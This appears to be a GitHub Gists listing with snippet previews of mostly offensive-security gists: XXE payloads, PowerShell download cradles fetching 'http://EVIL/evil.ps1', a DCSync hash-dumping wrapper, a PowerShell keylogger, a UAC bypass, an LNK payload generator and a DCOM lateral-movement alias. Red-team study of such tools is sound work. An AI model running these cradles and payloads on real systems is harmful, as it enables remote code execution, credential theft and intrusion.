UniIsland / SimpleHTTPServerWithUpload.py

Created August 14, 2012 04:01

Simple Python Http Server with Upload

	#!/usr/bin/env python

	"""Simple HTTP Server With Upload.

	This module builds on BaseHTTPServer by implementing the standard GET
	and HEAD requests in a fairly straightforward manner.

	"""

kevin-smets / iterm2-solarized.md

Last active July 21, 2025 07:31

iTerm2 + Oh My Zsh + Solarized color scheme + Source Code Pro Powerline + Font Awesome + [Powerlevel10k] - (macOS)

Default

Powerlevel10k

staaldraad / XXE_payloads

Last active June 25, 2025 22:04

XXE Payloads

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

HarmJ0y / DownloadCradles.ps1

Last active July 18, 2025 16:33

Download Cradles

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

monoxgas / Invoke-DCSync.ps1

Last active December 2, 2024 08:46

What more could you want?

This file has been truncated, but you can view the full file.

	function Invoke-DCSync
	{
	<#
	.SYNOPSIS

	Uses dcsync from mimikatz to collect NTLM hashes from the domain.

	Author: @monoxgas
	Improved by: @harmj0y

HarmJ0y / PowerView-2.0-tricks.ps1

Last active May 18, 2025 13:19

PowerView-2.0 tips and tricks

	# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
	# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

	# get all the groups a user is effectively a member of, 'recursing up'
	Get-NetGroup -UserName <USER>

	# get all the effective members of a group, 'recursing down'
	Get-NetGroupMember -GoupName <GROUP> -Recurse

	# get the effective set of users who can administer a server

dasgoll / gist:7ca1c059dd3b3fbc7277

Created December 11, 2015 16:44

Simple Windows Keylogger using PowerShell

	#requires -Version 2
	function Start-KeyLogger($Path="$env:temp\keylogger.txt")
	{
	# Signatures for API Calls
	$signatures = @'
	[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
	public static extern short GetAsyncKeyState(int virtualKeyCode);
	[DllImport("user32.dll", CharSet=CharSet.Auto)]
	public static extern int GetKeyboardState(byte[] keystate);
	[DllImport("user32.dll", CharSet=CharSet.Auto)]

mattifestation / UACBypass.ps1

Last active December 6, 2024 14:12

	function Invoke-UACBypass {
	<#
	.SYNOPSIS

	Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

	Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None

enigma0x3 / Create-LNK.ps1

Created January 5, 2017 15:04

	function Create-LNKPayload{
	<#
	.SYNOPSIS

	Generates a malicous LNK file

	.PARAMETER LNKName

	Name of the LNK file you want to create.

rsmudge / comexec.cna

Created January 6, 2017 22:06

Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)

	# Lateral Movement alias
	# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

	# register help for our alias
	beacon_command_register("com-exec", "lateral movement with DCOM",
	"Synopsis: com-exec [target] [listener]\n\n" .
	"Run a payload on a target via DCOM MMC20.Application Object");

	# here's our alias to collect our arguments
	alias com-exec {